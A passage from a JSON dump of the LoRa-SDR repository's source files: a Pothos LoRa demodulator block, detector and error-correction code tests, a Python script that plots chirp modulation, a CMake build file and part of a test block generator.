m);\n\t\t\t}\n\t\t}\n\t}\n}\n\nstatic inline void diagonalDeterleaveSx(const uint16_t *symbols, const size_t numSymbols, uint8_t *codewords, const size_t PPM, const size_t RDD)\n{\n\tfor (size_t x = 0; x < numSymbols / (4 + RDD); x++)\n\t{\n\t\tconst size_t cwOff = x*PPM;\n\t\tconst size_t symOff = x*(4 + RDD);\n\t\tfor (size_t k = 0; k < 4 + RDD; k++)\n\t\t{\n\t\t\tfor (size_t m = 0; m < PPM; m++)\n\t\t\t{\n\t\t\t\tconst size_t i = (m + k) % PPM;\n\t\t\t\tconst auto bit = (symbols[symOff + k] >> m) & 0x1;\n\t\t\t\tcodewords[cwOff + i] |= (bit << k);\n\t\t\t}\n\t\t}\n\t}\n}\n\nstatic inline void diagonalDeterleaveSx2(const uint16_t *symbols, const size_t numSymbols, uint8_t *codewords, const size_t PPM, const size_t RDD){\n\tsize_t nb = RDD + 4;\n\tfor (size_t x = 0; x < numSymbols / nb; x++) {\n\t\tconst size_t cwOff = x*PPM;\n\t\tconst size_t symOff = x*nb;\n\t\tfor (size_t m = 0; m < PPM; m++) {\n\t\t\tsize_t i = m;\n\t\t\tauto sym = symbols[symOff + m];\n\t\t\tfor (size_t k = 0; k < PPM; k++, sym >>= 1) {\n\t\t\t\tcodewords[cwOff + i] |= (sym & 1) << m;\n\t\t\t\tif (++i == PPM) i = 0;\n\t\t\t}\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.5569620132446289,
"alphanum_fraction": 0.579300045967102,
"avg_line_length": 37.371429443359375,
"blob_id": "21e757df106a1d9e6fa91101213b5f12b8cabd39",
"content_id": "045e2ab7cc633e1cf3a3e7c611c374de2a6ffbd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1343,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 35,
"path": "/TestDetector.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Testing.hpp>\n#include \"LoRaDetector.hpp\"\n#include \"ChirpGenerator.hpp\"\n#include <iostream>\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_detector)\n{\n const size_t N = 1 << 10;\n float phaseAccum = 0.0f;\n std::vector<std::complex<float>> downChirp(N);\n genChirp(downChirp.data(), N, 1, N, 0.0f, true, 1.0f, phaseAccum);\n\n for (size_t sym = 0; sym < N; sym++)\n {\n std::cout << \"testing detector on symbol = \" << sym << std::endl;\n std::vector<std::complex<float>> chirp(N);\n phaseAccum = M_PI/4; //some phase offset\n genChirp(chirp.data(), N, 1, N, float(2*M_PI*sym)/N, false, 1.0f, phaseAccum);\n\n LoRaDetector<float> detector(N);\n for (size_t i = 0; i < N; i++) detector.feed(i, downChirp[i]*chirp[i]);\n float power, powerAvg, fIndex;\n const size_t index = detector.detect(power, powerAvg, fIndex);\n std::cout << \" index \" << index << std::endl;\n std::cout << \" power \" << power << std::endl;\n std::cout << \" powerAvg \" << powerAvg << std::endl;\n std::cout << \" snr \" << (power-powerAvg) << std::endl;\n std::cout << \" fIndex \" << fIndex << std::endl;\n POTHOS_TEST_EQUAL(sym, index);\n POTHOS_TEST_TRUE(power > -10.0);\n }\n}\n"
},
{
"alpha_fraction": 0.4974290132522583,
"alphanum_fraction": 0.508458137512207,
"avg_line_length": 32.8863639831543,
"blob_id": "851b42b84064dc93faf011dc1099e9482aa3a0f1",
"content_id": "6245cb29e913e1859428d95a566df68079356691",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 13419,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 396,
"path": "/LoRaDemod.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <complex>\n#include <cstring>\n#include <cmath>\n#include \"LoRaDetector.hpp\"\n\n/***********************************************************************\n * |PothosDoc LoRa Demod\n *\n * Demodulate LoRa packets from a complex sample stream into symbols.\n *\n * <h2>Input format</h2>\n *\n * The input port 0 accepts a complex sample stream of modulated chirps\n * received at the specified bandwidth and carrier frequency.\n *\n * <h2>Output format</h2>\n *\n * The output port 0 produces a packet containing demodulated symbols.\n * The format of the packet payload is a buffer of unsigned shorts.\n * A 16-bit short can fit all size symbols from 7 to 12 bits.\n *\n * <h2>Debug port raw</h2>\n *\n * The raw debug port outputs the LoRa signal annotated with labels\n * for important synchronization points in the input sample stream.\n *\n * <h2>Debug port dec</h2>\n *\n * The dec debug port outputs the LoRa signal downconverted\n * by a locally generated chirp with the same annotation labels as the raw output.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |param sf[Spread factor] The spreading factor controls the symbol spread.\n * Each symbol will occupy 2^SF number of samples given the waveform BW.\n * |default 10\n *\n * |param sync[Sync word] The sync word is a 2-nibble, 2-symbol sync value.\n * The sync word is encoded after the up-chirps and before the down-chirps.\n * The demodulator ignores packets that do not match the sync word.\n * |default 0x12\n *\n * |param thresh[Threshold] The minimum required level in dB for the detector.\n * The threshold level is used to enter and exit the demodulation state machine.\n * |units dB\n * |default -30.0\n *\n * |param mtu[Symbol MTU] Produce MTU at most symbols after sync is found.\n * The demodulator does not inspect the payload and will produce at most\n * the specified MTU number of symbols or less if the detector squelches.\n * |units symbols\n * |default 256\n *\n * |factory /lora/lora_demod(sf)\n * |setter setSync(sync)\n * |setter setThreshold(thresh)\n * |setter setMTU(mtu)\n **********************************************************************/\nclass LoRaDemod : public Pothos::Block\n{\npublic:\n LoRaDemod(const size_t sf):\n N(1 << sf),\n _fineSteps(128),\n _detector(N),\n _sync(0x12),\n _thresh(-30.0),\n _mtu(256)\n {\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDemod, setSync));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDemod, setThreshold));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDemod, setMTU));\n this->setupInput(0, typeid(std::complex<float>));\n this->setupOutput(0);\n this->setupOutput(\"raw\", typeid(std::complex<float>));\n this->setupOutput(\"dec\", typeid(std::complex<float>));\n this->setupOutput(\"fft\", typeid(std::complex<float>));\n \n this->registerSignal(\"error\");\n this->registerSignal(\"power\");\n this->registerSignal(\"snr\");\n\n //use at most two input symbols available\n this->input(0)->setReserve(N*2);\n\n //store port pointers to avoid lookup by name\n _rawPort = this->output(\"raw\");\n _decPort = this->output(\"dec\");\n _fftPort = this->output(\"fft\");\n \n //generate chirp table\n float phase = -M_PI;\n double phaseAccum = 0.0;\n for (size_t i = 0; i < N; i++)\n {\n phaseAccum += phase;\n auto entry = std::polar(1.0, phaseAccum);\n _upChirpTable.push_back(std::complex<float>(std::conj(entry)));\n _downChirpTable.push_back(std::complex<float>(entry));\n phase += (2*M_PI)/N;\n }\n phaseAccum = 0.0;\n phase = 2.0 * M_PI / (N * _fineSteps);\n for (size_t i = 0; i < N * _fineSteps; i++){\n phaseAccum += phase;\n auto entry = std::polar(1.0, phaseAccum);\n _fineTuneTable.push_back(std::complex<float>(entry));\n }\n \n _fineTuneIndex = 0;\n }\n\n static Block *make(const size_t sf)\n {\n return new LoRaDemod(sf);\n }\n\n void setSync(const unsigned char sync)\n {\n _sync = sync;\n }\n\n void setThreshold(const double thresh_dB)\n {\n _thresh = thresh_dB;\n }\n\n void setMTU(const size_t mtu)\n {\n _mtu = mtu;\n }\n\n void activate(void)\n {\n _state = STATE_FRAMESYNC;\n _chirpTable = _upChirpTable.data();\n }\n\n void work(void)\n {\n auto inPort = this->input(0);\n if (inPort->elements() < N*2) return;\n \n size_t total = 0;\n auto inBuff = inPort->buffer().as<const std::complex<float> *>();\n auto rawBuff = _rawPort->buffer().as<std::complex<float> *>();\n auto decBuff = _decPort->buffer().as<std::complex<float> *>();\n auto fftBuff = _fftPort->buffer().as<std::complex<float> *>();\n\n //process the available symbol\n for (size_t i = 0; i < N; i++){\n auto samp = inBuff[i];\n auto decd = samp*_chirpTable[i] * _fineTuneTable[_fineTuneIndex];\n _fineTuneIndex -= _finefreqError * _fineSteps;\n if (_fineTuneIndex < 0) _fineTuneIndex += N * _fineSteps;\n else if (_fineTuneIndex >= int(N * _fineSteps)) _fineTuneIndex -= N * _fineSteps;\n rawBuff[i] = samp;\n decBuff[i] = decd;\n _detector.feed(i, decd);\n }\n float power = 0;\n float powerAvg = 0;\n float snr = 0;\n float fIndex = 0;\n \n auto value = _detector.detect(power,powerAvg,fIndex,fftBuff);\n snr = power - powerAvg;\n const bool squelched = (snr < _thresh);\n\n switch (_state)\n {\n ////////////////////////////////////////////////////////////////\n case STATE_FRAMESYNC:\n ////////////////////////////////////////////////////////////////\n {\n //format as observed from inspecting RN2483\n bool syncd = not squelched and (_prevValue+4)/8 == 0;\n bool match0 = (value+4)/8 == unsigned(_sync>>4);\n bool match1 = false;\n\n //if the symbol matches sync word0 then check sync word1 as well\n //otherwise assume its the frame sync and adjust for frequency error\n if (syncd and match0)\n {\n int ft = _fineTuneIndex;\n for (size_t i = 0; i < N; i++)\n {\n auto samp = inBuff[i + N];\n auto decd = samp*_chirpTable[i] * _fineTuneTable[ft];\n ft -= _finefreqError * _fineSteps;\n if (ft < 0) ft += N * _fineSteps;\n else if (ft >= int(N * _fineSteps)) ft -= N * _fineSteps;\n rawBuff[i+N] = samp;\n decBuff[i+N] = decd;\n _detector.feed(i, decd);\n }\n auto value1 = _detector.detect(power,powerAvg,fIndex);\n //format as observed from inspecting RN2483\n match1 = (value1+4)/8 == unsigned(_sync & 0xf);\n }\n\n if (syncd and match0 and match1)\n {\n total = 2*N;\n _state = STATE_DOWNCHIRP0;\n _chirpTable = _downChirpTable.data();\n _id = \"SYNC\";\n }\n\n //otherwise its a frequency error\n else if (not squelched)\n {\n total = N - value;\n _finefreqError += fIndex;\n\t\t\t\tstd::stringstream stream;\n\t\t\t\tstream.precision(4);\n\t\t\t\tstream << std::fixed << \"P \" << fIndex;\n\t\t\t\t_id = stream.str();\n // _id = \"P \" + std::to_string(fIndex);\n }\n\n //just noise\n else\n {\n total = N;\n _finefreqError = 0;\n _fineTuneIndex = 0;\n _id = \"\";\n }\n\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DOWNCHIRP0:\n ////////////////////////////////////////////////////////////////\n {\n _state = STATE_DOWNCHIRP1;\n total = N;\n _id = \"DC\";\n int error = value;\n if (value > N/2) error -= N;\n //std::cout << \"error0 \" << error << std::endl;\n _freqError = error;\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DOWNCHIRP1:\n ////////////////////////////////////////////////////////////////\n {\n _state = STATE_QUARTERCHIRP;\n total = N;\n _chirpTable = _upChirpTable.data();\n _id = \"\";\n _outSymbols = Pothos::BufferChunk(typeid(int16_t), _mtu);\n\n int error = value;\n if (value > N/2) error -= N;\n //std::cout << \"error1 \" << error << std::endl;\n _freqError = (_freqError + error)/2;\n\n this->emitSignal(\"error\", _freqError);\n this->emitSignal(\"power\", power);\n this->emitSignal(\"snr\", snr);\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_QUARTERCHIRP:\n ////////////////////////////////////////////////////////////////\n {\n _state = STATE_DATASYMBOLS;\n \n total = N/4 + (_freqError / 2);\n _finefreqError += (_freqError / 2);\n \n _symCount = 0;\n _id = \"QC\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DATASYMBOLS:\n ////////////////////////////////////////////////////////////////\n {\n total = N;\n _outSymbols.as<int16_t *>()[_symCount++] = int16_t(value);\n if (_symCount >= _mtu or squelched)\n {\n //for (size_t j = 0; j < _symCount; j++)\n // std::cout << \"demod[\" << j << \"]=\" << _outSymbols.as<const uint16_t *>()[j] << std::endl;\n Pothos::Packet pkt;\n pkt.payload = _outSymbols;\n pkt.payload.length = _symCount*sizeof(int16_t);\n this->output(0)->postMessage(pkt);\n _finefreqError = 0;\n _state = STATE_FRAMESYNC;\n }\n\t\t\tstd::stringstream stream;\n\t\t\tstream.precision(4);\n\t\t\tstream << std::fixed << \"S\" << _symCount << \" \" << fIndex;\n\t\t\t_id = stream.str();\n //_id = \"S\" + std::to_string(_symCount) + \" \" + std::to_string(fIndex);\n \n // _finefreqError += fIndex;\n \n } break;\n\n }\n\n if (not _id.empty())\n {\n _rawPort->postLabel(Pothos::Label(_id, Pothos::Object(), 0));\n _decPort->postLabel(Pothos::Label(_id, Pothos::Object(), 0));\n _fftPort->postLabel(Pothos::Label(_id, Pothos::Object(), 0));\n }\n inPort->consume(total);\n _rawPort->produce(total);\n _decPort->produce(total);\n \n _fftPort->produce(N);\n \n _prevValue = value;\n }\n\n //! Custom output buffer manager with slabs large enough for debug output\n Pothos::BufferManager::Sptr getOutputBufferManager(const std::string &name, const std::string &domain)\n {\n if (name == \"raw\" or name == \"dec\")\n {\n this->output(name)->setReserve(N * 2);\n Pothos::BufferManagerArgs args;\n args.bufferSize = N*2*sizeof(std::complex<float>);\n return Pothos::BufferManager::make(\"generic\", args);\n }else if (name == \"fft\"){\n this->output(name)->setReserve(N);\n Pothos::BufferManagerArgs args;\n args.bufferSize = N*sizeof(std::complex<float>);\n return Pothos::BufferManager::make(\"generic\", args);\n }\n return Pothos::Block::getOutputBufferManager(name, domain);\n }\n\n //! Custom input buffer manager with slabs large enough for fft input\n Pothos::BufferManager::Sptr getInputBufferManager(const std::string &name, const std::string &domain)\n {\n if (name == \"0\")\n {\n Pothos::BufferManagerArgs args;\n args.bufferSize = std::max(args.bufferSize,\n N*2*sizeof(std::complex<float>));\n return Pothos::BufferManager::make(\"generic\", args);\n }\n return Pothos::Block::getInputBufferManager(name, domain);\n }\n\nprivate:\n //configuration\n const size_t N;\n const size_t _fineSteps;\n LoRaDetector<float> _detector;\n std::complex<float> *_chirpTable;\n std::vector<std::complex<float>> _upChirpTable;\n std::vector<std::complex<float>> _downChirpTable;\n std::vector<std::complex<float>> _fineTuneTable;\n unsigned char _sync;\n float _thresh;\n size_t _mtu;\n Pothos::OutputPort *_rawPort;\n Pothos::OutputPort *_decPort;\n Pothos::OutputPort *_fftPort;\n\n //state\n enum LoraDemodState\n {\n STATE_FRAMESYNC,\n STATE_DOWNCHIRP0,\n STATE_DOWNCHIRP1,\n STATE_QUARTERCHIRP,\n STATE_DATASYMBOLS,\n };\n LoraDemodState _state;\n size_t _symCount;\n Pothos::BufferChunk _outSymbols;\n std::string _id;\n short _prevValue;\n int _freqError;\n int _fineTuneIndex;\n float _finefreqError;\n};\n\nstatic Pothos::BlockRegistry registerLoRaDemod(\n \"/lora/lora_demod\", &LoRaDemod::make);\n"
},
{
"alpha_fraction": 0.5281110405921936,
"alphanum_fraction": 0.5532816052436829,
"avg_line_length": 33.282257080078125,
"blob_id": "09abdc5c12924af47f85dfd5a9c2bbb2c5e97a06",
"content_id": "808bfae2b4f3852a71145b6f351f1afeda95f455",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4251,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 124,
"path": "/examples/modulation_explained_plots.py",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport math\nimport cmath\nimport scipy.signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef modulate(N, sym=0, numSamps=None):\n if numSamps is None: numSamps = N\n phase = -math.pi\n samps = list()\n accum = 0\n off = (2*math.pi*sym)/N\n for i in range(numSamps):\n accum += phase + off\n samps.append(cmath.rect(1.0, accum))\n phase += (2*math.pi)/N\n return np.array(samps)\n\nif __name__ == '__main__':\n\n ####################################################################\n ## showing modulation basics\n ####################################################################\n SF = 8\n N = 1 << SF\n syms = [0, 0, 50, 100, 200]\n chirps = np.concatenate([modulate(N, sym) for sym in syms])\n fmdemod = np.angle(chirps[1:] * np.conj(chirps)[:-1])\n clock = np.concatenate([[3]+[0]*((1<<SF)-1) for i in range(len(syms))])\n\n fig = plt.figure(figsize=(20, 5))\n\n ax = fig.add_subplot(2, 1, 1)\n ax.set_title('Raw modulated I and Q: SF = %d, symbols=%s'%(SF, syms))\n ax.plot(np.arange(0, chirps.size, 1), np.real(chirps))\n ax.plot(np.arange(0, chirps.size, 1), np.imag(chirps))\n ax.grid(True)\n ax.set_xlim(0, chirps.size)\n\n ax = fig.add_subplot(2, 1, 2)\n ax.set_title('Frequency demodulated: SF = %d, symbols=%s'%(SF, syms))\n ax.plot(np.arange(0, fmdemod.size, 1), fmdemod)\n ax.plot(np.arange(0, len(syms)*(N), N), [0]*len(syms), 'xk', markersize=20)\n ax.grid(True)\n ax.set_xlim(0, chirps.size)\n\n outPath = '/tmp/plot0_mod.png'\n print(\"Writing plot to %s\"%outPath)\n plt.tight_layout()\n fig.savefig(outPath)\n plt.close(fig)\n os.system('convert %s -trim -bordercolor white -border 5 %s'%(outPath, outPath))\n\n ####################################################################\n ## showing demodulation basics\n ####################################################################\n\n downchirp = np.conj(modulate(N))\n chirps = np.concatenate([modulate(N)[N/4:], chirps])\n dechirped = np.array([])\n i = 0\n outsyms = list()\n clock = list()\n ffts = list()\n while i <= chirps.size-(N):\n #print i\n chunk = chirps[i:i+(1 <<SF)] * downchirp\n value = np.argmax(np.abs(np.fft.fft(chunk)))\n outsyms.append(value)\n ffts.append(np.abs(np.fft.fft(chunk)))\n #print \"val\", value\n total = N\n #use this as the offset\n if i == 0: total -= value\n dechirped = np.concatenate([dechirped, chunk[:total]])\n clock.append(i)\n i += total\n fmdemod = np.angle(dechirped[1:] * np.conj(dechirped)[:-1])\n\n fig = plt.figure(figsize=(20, 5))\n\n ax = fig.add_subplot(2, 1, 1)\n ax.set_title('De-chirped I and Q: SF = %d'%(SF,))\n ax.plot(np.arange(0, dechirped.size, 1), np.real(dechirped))\n ax.plot(np.arange(0, dechirped.size, 1), np.imag(dechirped))\n ax.grid(True)\n ax.set_xlim(0, dechirped.size)\n\n ax = fig.add_subplot(2, 1, 2)\n ax.set_title('Frequency demodulated: SF = %d'%(SF,))\n ax.plot(np.arange(0, fmdemod.size, 1), fmdemod)\n ax.plot(clock, [0]*len(clock), 'xk', markersize=20)\n ax.grid(True)\n ax.set_xlim(0, dechirped.size)\n\n outPath = '/tmp/plot1_demod.png'\n print(\"Writing plot to %s\"%outPath)\n plt.tight_layout()\n fig.savefig(outPath)\n plt.close(fig)\n os.system('convert %s -trim -bordercolor white -border 5 %s'%(outPath, outPath))\n\n fig = plt.figure(figsize=(20, 5))\n\n for i, fft in enumerate(ffts):\n ax = fig.add_subplot(2, 3, i+1)\n ax.set_title('FFT for symbol #%d, detected %d'%(i,outsyms[i]), fontsize=12)\n ax.plot(np.arange(0, fft.size, 1), fft)\n ax.plot([outsyms[i]], [fft[outsyms[i]]], 'xk', markersize=20)\n ax.grid(True)\n ax.get_yaxis().set_ticks([0, 100, 200, 300])\n #ax.tick_params(axis='both', which='major', labelsize=10)\n #ax.tick_params(axis='both', which='minor', labelsize=8)\n ax.set_xlim(0, N-1)\n ax.get_xaxis().set_ticks(np.arange(0, N, 64))\n\n outPath = '/tmp/plot2_ffts.png'\n print(\"Writing plot to %s\"%outPath)\n plt.tight_layout()\n fig.savefig(outPath)\n plt.close(fig)\n os.system('convert %s -trim -bordercolor white -border 5 %s'%(outPath, outPath))\n"
},
{
"alpha_fraction": 0.42247799038887024,
"alphanum_fraction": 0.42586323618888855,
"avg_line_length": 30.4255313873291,
"blob_id": "a1e3c3531f288022c91391660e64218a82d317a0",
"content_id": "84dbf860ed2e82d1e3241f54efc7fbb9ac5efd84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1477,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 47,
"path": "/CMakeLists.txt",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "########################################################################\n# Project setup\n########################################################################\ncmake_minimum_required(VERSION 2.8.9)\nproject(LoRa_Blocks CXX)\n\nfind_package(Pothos \"0.6\" CONFIG REQUIRED)\n\n########################################################################\n## Compiler specifics\n########################################################################\nenable_language(C)\ninclude(CheckIncludeFiles)\nCHECK_INCLUDE_FILES(alloca.h HAS_ALLOCA_H)\nif(HAS_ALLOCA_H)\n add_definitions(-DHAS_ALLOCA_H)\nendif(HAS_ALLOCA_H)\n\n########################################################################\n# json.hpp header\n########################################################################\nfind_path(JSON_HPP_INCLUDE_DIR NAMES json.hpp PATH_SUFFIXES nlohmann)\n\nif (NOT JSON_HPP_INCLUDE_DIR)\n message(FATAL_ERROR \"LoRa toolkit requires json.hpp, skipping...\")\nendif (NOT JSON_HPP_INCLUDE_DIR)\n\ninclude_directories(${JSON_HPP_INCLUDE_DIR})\n\n########################################################################\n## LoRa blocks\n########################################################################\nPOTHOS_MODULE_UTIL(\n TARGET LoRa_Blocks\n SOURCES\n LoRaDemod.cpp\n LoRaMod.cpp\n LoRaEncoder.cpp\n LoRaDecoder.cpp\n TestLoopback.cpp\n TestGen.cpp\n BlockGen.cpp\n TestCodesSx.cpp\n TestDetector.cpp\n DESTINATION lora\n ENABLE_DOCS\n)\n"
},
{
"alpha_fraction": 0.5123416781425476,
"alphanum_fraction": 0.5411032438278198,
"avg_line_length": 28.30188751220703,
"blob_id": "187f2dcbb8d4a79d2615d1b37d25dcd6ed456d14",
"content_id": "089fff48be6f835dbbcade50cf051e10c56e9028",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4659,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 159,
"path": "/TestCodesSx.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Testing.hpp>\n#include <iostream>\n#include \"LoRaCodes.hpp\"\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_hamming84_sx)\n{\n bool error;\n bool bad;\n unsigned char decoded;\n\n //test hamming 84 with bit errors\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeHamming84sx(byte);\n\n //check no bit errors\n error = false;\n bad = false;\n decoded = decodeHamming84sx(encoded, error, bad);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_TRUE(not bad);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n error = false;\n bad = false;\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = decodeHamming84sx(encoded1err, error, bad);\n POTHOS_TEST_TRUE(error);\n POTHOS_TEST_TRUE(not bad);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit1 = 0; bit1 < 8; bit1++)\n {\n if (bit1 == bit0) continue;\n\n //check 2 bit errors (cant correct, but can detect\n error = false;\n bad = false;\n unsigned char encoded2err = encoded1err ^ (1 << bit1);\n decoded = decodeHamming84sx(encoded2err, error, bad);\n POTHOS_TEST_TRUE(error);\n POTHOS_TEST_TRUE(bad);\n }\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_hamming74_sx)\n{\n bool error;\n unsigned char decoded;\n\n //test hamming 74 with bit errors\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeHamming74sx(byte);\n\n //check no bit errors\n error = false;\n decoded = decodeHamming74sx(encoded, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 7; bit0++)\n {\n //check 1 bit error\n error = false;\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = decodeHamming74sx(encoded1err, error);\n POTHOS_TEST_TRUE(error);\n POTHOS_TEST_EQUAL(byte, decoded);\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_parity64_sx)\n{\n bool error;\n unsigned char decoded;\n\n //test parity 64, see if bit error detected\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeParity64(byte);\n\n //check no bit errors\n error = false;\n decoded = checkParity64(encoded, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = checkParity64(encoded1err, error);\n POTHOS_TEST_TRUE(error);\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_parity54_sx)\n{\n bool error;\n unsigned char decoded;\n\n //test parity 54, see if bit error detected\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeParity54(byte);\n\n //check no bit errors\n error = false;\n decoded = checkParity54(encoded, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = checkParity54(encoded1err, error);\n POTHOS_TEST_TRUE(error);\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_interleaver_sx)\n{\n for (size_t PPM = 7; PPM <= 12; PPM++)\n {\n std::cout << \"Testing PPM \" << PPM << std::endl;\n for (size_t RDD = 0; RDD <= 4; RDD++)\n {\n std::cout << \" with RDD \" << RDD << std::endl;\n std::vector<uint8_t> inputCws(PPM);\n const auto mask = (1 << (RDD+4))-1;\n for (auto &x : inputCws) x = std::rand() & mask;\n\n std::vector<uint16_t> symbols(((RDD+4)*inputCws.size())/PPM);\n diagonalInterleaveSx(inputCws.data(), inputCws.size(), symbols.data(), PPM, RDD);\n\n std::vector<uint8_t> outputCws(inputCws.size());\n diagonalDeterleaveSx(symbols.data(), symbols.size(), outputCws.data(), PPM, RDD);\n\n POTHOS_TEST_EQUALV(inputCws, outputCws);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5722455382347107,
"alphanum_fraction": 0.6038886904716492,
"avg_line_length": 24.97029685974121,
"blob_id": "e9092e5216ea1699b082064d36be429983a23120",
"content_id": "06d532952c8bcd2ea0d09edf1dd76146e9ee36b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2623,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 101,
"path": "/BlockGen.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <cstring>\n\n/***********************************************************************\n* |PothosDoc LoRa Block Gen\n*\n* Generate test blocks for the LoRa modulator for testing purposes.\n*\n* |category /LoRa\n* |keywords lora\n*\n* |param elements Specify a list of elements to produce.\n* |default [100, 200, 300, 400, 500, 600 ,700, 800]\n*\n* |param ws[Word Size] The number of error correction bits.\n* |option [8] \"8\"\n* |option [16] \"16\"\n* |option [32] \"32\"\n* |default \"16\"\n*\n* |factory /lora/block_gen()\n* |setter setElements(elements)\n* |setter setWordSize(ws)\n*\n**********************************************************************/\nclass BlockGen : public Pothos::Block\n{\npublic:\n\tBlockGen(void) : _ws(1) {\n\t\tthis->setupOutput(0);\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(BlockGen, setElements));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(BlockGen, setTrigger));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(BlockGen, setWordSize));\n\t}\n\n\tvoid setElements(const std::vector<uint32_t> &elems) {\n\t\t_elements = elems;\n\t\t_active = true;\n\t}\n\n\tvoid setTrigger(const int value) {\n\t\t_active = true;\n\t}\n\n\tstatic Block *make(void){\n\t\treturn new BlockGen();\n\t}\n\n\tvoid setWordSize(const std::string &ws){\n\t\tif (ws == \"8\") _ws = 0;\n\t\telse if (ws == \"16\") _ws = 1;\n\t\telse if (ws == \"32\") _ws = 2;\n\t\telse throw Pothos::InvalidArgumentException(\"LoRaBlockGen::setWordSize(\" + ws + \")\", \"unknown word size\");\n\t}\n\n\tvoid activate(void){\n\t\t_active = true;\n\t}\n\n\tvoid work(void){\n\t\tif (!_active) return;\n\t\t_active = false;\n\t\tPothos::Packet outPkt;\n\t\tif (0 == _ws) {\n\t\t\tPothos::BufferChunk msgBuff(typeid(uint8_t), _elements.size());\n\t\t\tuint8_t *p = msgBuff.as<uint8_t *>();\n\t\t\tfor (size_t i = 0; i < _elements.size(); i++) {\n\t\t\t\tp[i] = _elements[i] & 0xff;\n\t\t\t}\n\t\t\toutPkt.payload = msgBuff;\n\t\t}else if (1 == _ws){\n\t\t\tPothos::BufferChunk msgBuff(typeid(uint16_t), _elements.size());\n\t\t\tuint16_t *p = msgBuff.as<uint16_t *>();\n\t\t\tfor (size_t i = 0; i < _elements.size(); i++) {\n\t\t\t\tp[i] = _elements[i] & 0xffff;\n\t\t\t}\n\t\t\toutPkt.payload = msgBuff;\n\t\t}else {\n\t\t\tPothos::BufferChunk msgBuff(typeid(uint32_t), _elements.size());\n\t\t\tuint32_t *p = msgBuff.as<uint32_t *>();\n\t\t\tfor (size_t i = 0; i < _elements.size(); i++) {\n\t\t\t\tp[i] = _elements[i];\n\t\t\t}\n\t\t\toutPkt.payload = msgBuff;\n\t\t}\n\t\t\n\t\tthis->output(0)->postMessage(outPkt);\n\t}\n\nprivate:\n\t//configuration\n\tbool _active;\n\tsize_t 